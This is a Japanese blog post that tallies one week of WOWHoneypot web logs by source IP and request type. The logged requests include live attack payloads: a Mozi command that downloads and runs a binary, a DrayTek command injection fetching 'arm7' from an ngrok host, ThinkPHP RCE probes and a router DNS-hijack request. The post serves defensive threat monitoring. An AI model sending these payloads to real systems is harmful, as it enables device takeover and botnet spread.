家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

Wowhoneypotログ分析(2020/05/23-2020/05/30)

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

 

 

 

対象期間

2020/05/23-2020/05/30

 

ログの集計

送信元 内容 検知数
    0
103.113.106.15 \"GET / 1
103.145.12.53 \"GET / 1
103.50.5.230 \"GET / 1
104.248.33.135 \"GET / 1
104.248.92.71 \"GET / 1
106.12.132.21 \"GET / 1
110.154.247.40 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
110.78.184.241 \"GET / 1
117.169.92.169 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
117.254.56.251 \"GET / 1
128.14.134.134 \"GET / 1
128.14.209.178 \"GET /login.html 1
134.175.45.127 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
134.19.215.196 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
136.243.208.164 \"GET / 1
  \"GET //Admin/scripts/setup.php 1
  \"GET //myadmin/scripts/setup.php 2
  \"GET //phpMyAdmin/scripts/setup.php 2
  \"GET //pma/scripts/setup.php 1
  \"GET /muieblackcat 1
139.162.119.197 \"GET / 1
156.96.155.242 \"GET / 1
  \"GET /admin/ 1
  \"GET /agSearch/SQlite/main.php 1
  \"GET /dbadmin/ 1
  \"GET /HNAP1/ 1
  \"GET /hudson/script 1
  \"GET /main.php 1
  \"GET /myadmin/ 1
  \"GET /mysql-admin/ 1
  \"GET /mysql/ 1
  \"GET /mysqladmin/ 1
  \"GET /mysqlmanager/ 1
  \"GET /openserver/phpmyadmin/ 1
  \"GET /p/m/a/ 1
  \"GET /php-my-admin/ 1
  \"GET /php-myadmin/ 1
  \"GET /phpmanager/ 1
  \"GET /phpmy-admin/ 1
  \"GET /phpMyAdmin-2.2.3/ 1
  \"GET /phpMyAdmin-2.2.6/ 1
  \"GET /phpMyAdmin-2.5.1/ 1
  \"GET /phpMyAdmin-2.5.4/ 1
  \"GET /phpMyAdmin-2.5.5-pl1/ 1
  \"GET /phpMyAdmin-2.5.5-rc1/ 1
  \"GET /phpMyAdmin-2.5.5-rc2/ 1
  \"GET /phpMyAdmin-2.5.5/ 1
  \"GET /phpMyAdmin-2.5.6-rc1/ 1
  \"GET /phpMyAdmin-2.5.6-rc2/ 1
  \"GET /phpMyAdmin-2.5.6/ 1
  \"GET /phpMyAdmin-2.5.7-pl1/ 1
  \"GET /phpMyAdmin-2.5.7/ 1
  \"GET /phpMyAdmin-2.6.0-alpha/ 1
  \"GET /phpMyAdmin-2.6.0-alpha2/ 1
  \"GET /phpMyAdmin-2.6.0-beta1/ 1
  \"GET /phpMyAdmin-2.6.0-beta2/ 1
  \"GET /phpMyAdmin-2.6.0-pl1/ 1
  \"GET /phpMyAdmin-2.6.0-pl2/ 1
  \"GET /phpMyAdmin-2.6.0-pl3/ 1
  \"GET /phpMyAdmin-2.6.0-rc1/ 1
  \"GET /phpMyAdmin-2.6.0-rc2/ 1
  \"GET /phpMyAdmin-2.6.0-rc3/ 1
  \"GET /phpMyAdmin-2.6.0/ 1
  \"GET /phpMyAdmin-2.6.1-pl1/ 1
  \"GET /phpMyAdmin-2.6.1-pl2/ 1
  \"GET /phpMyAdmin-2.6.1-pl3/ 1
  \"GET /phpMyAdmin-2.6.1-rc1/ 1
  \"GET /phpMyAdmin-2.6.1-rc2/ 1
  \"GET /phpMyAdmin-2.6.1/ 1
  \"GET /phpMyAdmin-2.6.2-beta1/ 1
  \"GET /phpMyAdmin-2.6.2-pl1/ 1
  \"GET /phpMyAdmin-2.6.2-rc1/ 2
  \"GET /phpMyAdmin-2.6.2/ 1
  \"GET /phpMyAdmin-2.6.3-pl1/ 1
  \"GET /phpMyAdmin-2.6.3-rc1/ 1
  \"GET /phpMyAdmin-2.6.3/ 2
  \"GET /phpMyAdmin-2.6.4-pl1/ 1
  \"GET /phpMyAdmin-2.6.4-pl2/ 1
  \"GET /phpMyAdmin-2.6.4-pl3/ 1
  \"GET /phpMyAdmin-2.6.4-pl4/ 1
  \"GET /phpMyAdmin-2.6.4-rc1/ 1
  \"GET /phpMyAdmin-2.6.4/ 1
  \"GET /phpMyAdmin-2.7.0-beta1/ 1
  \"GET /phpMyAdmin-2.7.0-pl1/ 1
  \"GET /phpMyAdmin-2.7.0-pl2/ 1
  \"GET /phpMyAdmin-2.7.0-rc1/ 1
  \"GET /phpMyAdmin-2.7.0/ 1
  \"GET /phpMyAdmin-2.8.0-beta1/ 1
  \"GET /phpMyAdmin-2.8.0-rc1/ 1
  \"GET /phpMyAdmin-2.8.0-rc2/ 1
  \"GET /phpMyAdmin-2.8.0.1/ 1
  \"GET /phpMyAdmin-2.8.0.2/ 1
  \"GET /phpMyAdmin-2.8.0.3/ 1
  \"GET /phpMyAdmin-2.8.0.4/ 1
  \"GET /phpMyAdmin-2.8.0/ 1
  \"GET /phpMyAdmin-2.8.1-rc1/ 1
  \"GET /phpMyAdmin-2.8.1/ 1
  \"GET /phpMyAdmin-2.8.2/ 1
  \"GET /phpMyAdmin-2/ 1
  \"GET /phpmyadmin/ 2
  \"GET /phpmyadmin2/ 2
  \"GET /PMA/ 2
  \"GET /PMA2005/ 2
  \"GET /script 1
  \"GET /sqlite/main.php 3
  \"GET /SQLiteManager-1.2.4/main.php 1
  \"GET /sqlitemanager/main.php 2
  \"GET /sqlmanager/ 1
  \"GET /sqlweb/ 1
  \"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php 1
  \"GET /webadmin/ 1
  \"GET /webdb/ 1
  \"GET /websql/ 1
  \"GET http://www.msftncsi.com/ncsi.txt 1
162.243.136.45 \"GET /portal/redlion 1
162.243.143.101 \"GET / 1
162.243.143.168 \"GET /hudson 1
162.243.145.12 \"GET / 1
172.104.108.109 \"GET / 1
173.249.51.194 \"GET / 1
175.143.116.79 \"GET / 1
176.43.128.2 \"GET / 1
177.38.181.151 \"GET / 1
178.212.49.134 \"GET / 1
178.62.55.19 \"GET / 1
178.73.215.171 \"GET / 1
179.106.102.225 \"GET / 1
181.143.221.68 \"POST /cgi-bin/mainfunction.cgi 1
181.211.255.210 \"GET / 1
183.136.225.46 \"GET / 1
185.10.142.11 \"GET / 1
185.140.160.220 \"GET / 1
185.141.110.143 \"GET / 1
185.156.73.64 \"GET / 2
185.181.52.204 \"GET / 1
185.198.1.105 \"GET / 1
185.216.140.6 \"GET / 1
185.234.219.133 \"GET / 1
185.82.127.47 \"GET / 1
185.82.215.92 \"GET / 1
187.122.189.163 \"GET / 1
187.150.69.49 \"GET / 1
189.113.189.58 \"GET / 1
189.126.64.162 \"GET / 1
189.14.13.52 \"GET / 1
190.94.136.219 \"GET / 1
190.94.148.238 \"GET / 1
190.94.192.8 \"POST /cgi-bin/mainfunction.cgi 1
190.98.213.242 \"GET / 1
191.103.253.25 \"GET / 1
192.227.223.22 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
193.118.53.202 \"GET / 1
193.118.53.210 \"GET / 1
194.156.108.13 \"GET / 1
194.208.56.93 \"GET / 1
195.154.94.244 \"GET / 7
195.54.160.123 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 2
  \"GET /?XDEBUG_SESSION_START=phpstorm 2
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 2
  \"GET /solr/admin/info/system?wt=json 2
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 2
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
195.54.160.130 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 5
  \"GET /?XDEBUG_SESSION_START=phpstorm 5
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 5
  \"GET /solr/admin/info/system?wt=json 5
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 5
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
196.46.187.14 \"GET / 1
196.52.43.117 \"GET / 1
196.52.43.63 \"GET / 1
196.52.43.98 \"GET / 1
198.108.66.202 \"GET / 1
198.108.66.246 \"GET / 1
198.162.202.253 \"GET / 1
198.199.73.101 \"GET /admin/connection/ 1
  \"GET /favicon.ico 1
200.141.135.218 \"GET / 1
201.171.46.39 \"POST /cgi-bin/mainfunction.cgi 1
201.76.114.32 \"GET / 1
202.51.180.250 \"GET / 1
207.148.15.205 \"GET / 1
209.17.96.122 \"GET / 1
209.17.96.138 \"GET / 1
209.17.96.194 \"GET / 1
209.17.96.210 \"GET / 1
209.17.96.58 \"GET / 1
209.17.96.82 \"GET / 2
209.17.97.114 \"GET / 1
209.17.97.2 \"GET / 1
209.97.190.223 \"GET / 1
212.125.26.105 \"GET / 1
212.200.108.225 \"GET / 1
212.90.181.254 \"GET / 1
213.109.235.252 \"GET / 1
213.153.167.87 \"GET / 1
220.248.49.230 \"GET /TP/public/index.php 1
222.10.33.175 \"GET /operator/basic.shtml?id=1337 1
  \"GET /sess-bin/login_session.cgi 2
  \"GET /setup.cgi 1
  \"GET /shell?/bin/busybox+ABCD 2
  \"POST /doLogin 1
23.31.209.205 \"POST /cgi-bin/mainfunction.cgi 1
34.76.17.151 \"GET / 1
35.196.251.88 \"GET /bc9615d267dba809638d9fbc9eb55236.php 1
  \"GET /D90A75ABEFF190F2A31DA59546864E43.php 1
  \"GET /dbf772166781764452a2d50883ed1d63.php 1
  \"GET /phpmyadmin/index.php 2
37.119.104.59 \"GET /adv 1
39.104.130.149 \"GET / 2
  \"GET //navigation.html 1
  \"GET /Css/Pictures/Login/LoginContent.png 1
  \"GET /image/lgbg.jpg 1
  \"GET /images/login/login_01.jpg 1
  \"GET /images/logo.png 1
  \"GET /info/SYSTEM/_Application.htm 2
  \"GET /server.js 1
39.104.142.189 \"POST /onvif/device_service 1
47.89.192.12 \"GET / 1
47.96.114.93 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
5.101.0.209 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 3
  \"GET /?XDEBUG_SESSION_START=phpstorm 3
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 3
  \"GET /solr/admin/info/system?wt=json 3
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 3
  \"POST /api/jsonws/invoke 3
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 3
5.32.176.117 \"GET / 1
5.58.14.24 \"GET / 1
51.159.71.63 \"GET / 2
  \"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1 1
51.254.59.113 \"GET / 1
52.232.188.182 \"GET / 1
54.173.153.105 \"GET / 1
59.8.227.74 \"GET / 3
61.70.132.192 \"GET / 2
62.5.156.153 \"GET / 1
71.6.232.4 \"GET / 1
77.57.58.179 \"GET / 1
78.187.193.68 \"GET / 1
80.80.150.41 \"GET / 1
80.82.68.60 \"GET / 1
  \"GET /favicon.ico 1
  \"GET /robots.txt 1
80.82.70.118 \"GET / 2
81.211.44.50 \"GET / 1
82.55.240.23 \"GET /adv 1
82.62.97.143 \"GET / 5
89.168.181.138 \"GET / 1
89.218.249.86 \"GET / 1
89.240.158.102 \"GET / 1
89.36.211.92 \"GET / 1
91.222.108.56 \"GET / 1
91.232.157.226 \"GET / 1
91.236.177.162 \"GET / 2
92.118.161.21 \"GET / 1
94.242.57.16 \"HEAD / 1
95.5.252.227 \"GET / 1

 

コメント

  • この期間では「GET /manager/html」を検知しなかった。(前の期間では784回)
  • 家庭用ルータに対するDNSサーバの書き換えを狙った攻撃を確認。
    \"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1

    また、上記に含まれるIPアドレスはVirusTotalでも悪性のアドレスとして報告されている。

    www.virustotal.com


    securelist.com